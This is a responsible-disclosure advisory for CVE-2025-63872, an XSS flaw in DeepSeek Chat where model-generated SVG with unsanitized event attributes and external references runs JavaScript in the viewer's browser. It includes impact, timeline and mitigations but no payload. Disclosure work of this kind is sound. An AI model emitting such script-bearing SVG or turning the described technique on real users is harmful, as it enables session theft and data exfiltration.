Discovered by Vinit Kundu

A client-side XSS vulnerability allowing JavaScript execution through model-generated SVG content.

Overview

I recently discovered a security vulnerability in DeepSeek Chat V3.2 involving unsafe rendering of model-generated SVG, which can result in arbitrary JavaScript execution in the user's browser.

MITRE has formally assigned this issue CVE-2025-63872.

This post documents the vulnerability, impact, PoC (safe), and disclosure timeline.

This article contains non-exploit, defensive security research performed entirely for educational and responsible disclosure purposes.

Vulnerability Summary (CVE-2025-63872)

DeepSeek Chat's web interface directly inserts model-generated SVG fragments into the DOM without sanitizing:

  • Event attributes like onload, onerror, onclick
  • Script-capable SVG constructs
  • External resource references (<image href="…">)
  • Embedded interactive content

Because modern browsers treat SVG as active XML, this enables automatic JavaScript execution when the user views a crafted message.

Impact

Successful exploitation allows:

  • Arbitrary JavaScript execution in the DeepSeek Chat domain
  • Potential account/session compromise (depending on cookie flags)
  • CSRF actions executed under the victim's session
  • UI manipulation and phishing opportunities
  • Data exfiltration through remote requests

No user interaction is required other than viewing the message.

None
Controlled PoC demonstration showing JavaScript execution via model-generated SVG in DeepSeek Chat (CVE-2025–63872) (All sensitive content intentionally redacted.)

Affected Systems

  • DeepSeek Chat Web Interface (V3.2)
  • SVG parsing & message-rendering subsystem

Disclosure Timeline

2025-10-16 – Vulnerability reported to security@deepseek.com  
2025-10-16 – MITRE notified  
2025-11-18 – MITRE assigns CVE-2025-63872  
2025-10..11 – Multiple follow-ups, no vendor response  
2025-11-19  – Public disclosure

Vendor Status

The vendor has not responded to any communication attempts as of publication. No patch information is available.

Mitigation Recommendations

For Users

  • Avoid loading untrusted shared SVG content in DeepSeek Chat
  • Use non-web clients where possible
  • Log out after sessions and avoid persistent logins

For Vendor

  • Sanitize SVG input with libraries like DOMPurify (SVG-safe mode)
  • Strip all event attributes and scriptable SVG elements
  • Apply strict Content Security Policy (CSP)
  • Consider rasterizing SVG server-side or sandboxing rendering environments

Credit

Discovered by: Vinit Kundu CVE: CVE-2025-63872

Final Notes

This advisory reflects responsible disclosure efforts and 30+ days of attempted vendor contact without response. If DeepSeek publishes a fix, I will update this article with remediation details.

Disclaimer

This research was carried out entirely in a good-faith, ethical manner and was limited strictly to my own account, data, and browser session. I did not attempt to access, modify, disrupt, or interfere with any other user's data or any internal systems belonging to DeepSeek or its operators.

The goal of this disclosure is to raise security awareness and help the vendor and the community improve platform safety. No exploit code, harmful payloads, or instructions for weaponization are included in this report.

This publication does not encourage, endorse, or support misuse of the information contained herein. Any attempt to exploit vulnerabilities without authorization is illegal and unethical. The author is not responsible for misuse of this information by others.